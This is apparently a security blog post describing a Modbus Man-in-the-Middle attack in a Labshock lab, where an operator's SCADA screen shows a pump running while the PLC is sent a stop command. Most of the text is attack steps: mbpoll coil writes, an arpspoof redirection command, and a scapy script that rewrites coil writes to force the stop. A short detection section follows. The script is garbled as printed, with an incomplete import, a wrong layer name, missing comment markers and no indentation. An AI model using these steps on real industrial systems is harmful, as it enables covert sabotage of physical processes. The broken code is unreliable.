Modbus MITM Attack with Labshock: Fooling SCADA Systems

By /

Listen to this Post

In this article, we explore a real-world Man-in-the-Middle (MITM) attack on Modbus protocol using Labshock v1.5, demonstrating how an attacker can manipulate SCADA systems while remaining undetected by operators and IDS.

Attack Overview

  • SCADA displays a pump as running, but the PLC receives a stop command.
  • The operator remains unaware, while alarms (e.g., low pressure) trigger without a visible cause.
  • No alerts are generated, making detection difficult without proper tools.

Step-by-Step Attack Execution

1. Lab Setup

  • Deploy SCADA, PLC, Pentest Station, and IDS in a controlled environment.
  • Ensure Modbus/TCP communication is active.

2. Normal Operation Test

  • Verify pump control via SCADA: 
    Sample Modbus read/write commands (using mbpoll)
mbpoll -a 1 -t 0 -r 0 -c 1 192.168.1.10  Read coil status
mbpoll -a 1 -t 0 -r 0 -c 1 192.168.1.10 0  Write "stop" to coil

3. Launch MITM Attack

  • ARP Spoofing: Redirect traffic between SCADA and PLC: 
    arpspoof -i eth0 -t 192.168.1.1 192.168.1.10  SCADA -> PLC
  • Modbus Packet Manipulation: Use Python to alter coil writes: 
    from scapy.all import 
def modbus_mitm(pkt):
if pkt.haslayer(TCP) and pkt.dport == 502:
if Raw in pkt and b"\x05\x00" in pkt[bash].load:  Detect write coil
pkt[bash].load = pkt[bash].load.replace(b"\xFF\x00", b"\x00\x00")  Force "stop"
sendp(pkt, iface="eth0")
sniff(filter="tcp port 502", prn=modbus_mitm)

4. Observe Impact

  • SCADA logs show “pump running”, but PLC executes “stop”.
  • Operator sees no anomalies until process alarms trigger.

You Should Know: Detection & Mitigation

  • Network Monitoring: Detect ARP spoofing with: 
    arpwatch -i eth0  Monitor ARP changes
  • Encrypted Modbus (Modbus/TLS): Prevent packet manipulation.
  • Anomaly Detection: Use tools like Suricata with custom ICS rules: 
    alert modbus any any -> any 502 (msg:"Modbus coil overwrite"; content:"|05 00|"; sid:10001;)
  • Physical Segregation: Isolate OT networks from IT.

What Undercode Say

This attack highlights the critical risks in unsecured ICS protocols. While Modbus lacks encryption, compensating controls like network segmentation, anomaly detection, and protocol validation are essential. Red teams must simulate such attacks, while blue teams should deploy OT-specific IDS like Labshock or Nozomi Networks.

Expected Output:

  • A silent pump shutdown despite SCADA indicating normal operation.
  • No traditional IDS alerts, emphasizing the need for ICS-aware monitoring.

Reference:

References:

Reported By: Zakharb Otsiem – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Related Posts: